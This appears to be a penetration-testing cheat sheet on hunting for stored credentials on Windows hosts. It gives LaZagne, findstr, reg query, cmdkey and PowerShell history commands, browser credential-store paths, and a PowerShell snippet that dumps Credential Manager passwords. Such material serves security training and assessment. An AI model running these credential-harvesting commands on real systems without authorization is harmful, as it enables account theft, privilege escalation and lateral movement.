Credential Hunting in Windows
Windows Credential Hunting
Credential hunting in Windows environments can yield valuable access that allows for privilege escalation or lateral movement. This process involves searching for plain-text credentials in files, database files, config files, saved credentials, CLI history, and more.
Understanding the Target
Before diving into credential hunting, consider what an IT administrator might be doing on a day-to-day basis and which tasks require credentials:
Domain administration
Database management
Service configuration
Scheduled task creation
Remote administration
Script automation
Key Search Terms
Whether using GUI or CLI tools, knowing what to search for is critical:
Passwords
Passphrases
Keys
Username
User account
Creds
Users
Passkeys
Passphrases
configuration
dbcredential
dbpassword
pwd
Login
Credentials
Using LaZagne
LaZagne is a powerful tool for extracting stored credentials from numerous applications.
C:\Users\bob\Desktop> start lazagne.exe allThis executes LaZagne and runs all included modules. Add the -vv option to see detailed background operations.
LaZagne Output Example
|====================================================================|
| |
| The LaZagne Project |
| |
| ! BANG BANG ! |
| |
|====================================================================|
########## User: bob ##########
------------------- Winscp passwords -----------------
[+] Password found !!!
URL: 10.129.202.51
Login: admin
Password: SteveisReallyCool123
Port: 22Using findstr
Windows' built-in findstr command can search for patterns across many file types:
C:\> findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.ymlCommon Credential Storage Locations
Configuration Files
Web.config files
App.config files
ApplicationHost.config
PHP configuration files
XML configuration files
Registry
# PowerShell commands to search registry for passwords
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /sSaved Credentials
cmdkey /listPowerShell History
Get-History
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txtAdditional Hunting Locations
Passwords in Group Policy in the SYSVOL share
Passwords in scripts in the SYSVOL share
Password in scripts on IT shares
Passwords in web.config files on dev machines and IT shares
unattend.xml files
Passwords in the AD user or computer description fields
KeePass databases
Files such as pass.txt, passwords.docx, passwords.xlsx
Browser Stored Credentials
Modern browsers store credentials that can be extracted:
Chrome:
%LocalAppData%\Google\Chrome\User Data\Default\Login DataFirefox:
%AppData%\Mozilla\Firefox\Profiles\[profile]\logins.jsonEdge:
%LocalAppData%\Microsoft\Edge\User Data\Default\Login Data
Browser tools like LaZagne can extract these with proper commands:
C:\> lazagne.exe browsersService Account Credentials
Services often run with stored credentials:
Get-WmiObject -Class Win32_Service | Where-Object {$_.StartName -notlike "LocalSystem" -and $_.StartName -notlike "NT AUTHORITY\*" -and $_.StartName -notlike "NT SERVICE\*"} | Select-Object Name, StartName, StateCredential Manager
Windows Credential Manager stores various login credentials:
# PowerShell script to access Credential Manager
[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$vault = New-Object Windows.Security.Credentials.PasswordVault
$vault.RetrieveAll() | % { $_.RetrievePassword(); $_ }Best Practices for Credential Hunting
Be systematic: Create a checklist of locations to examine
Document findings: Record all credentials and their sources
Prioritize high-value targets: Focus on administrative and service accounts
Consider timing: Some credentials may be exposed only during specific operations
Look for patterns: Users often reuse passwords with slight variations
By thoroughly exploring these common storage locations, you can often find credentials that provide increased access and privileges within a Windows environment.
Last updated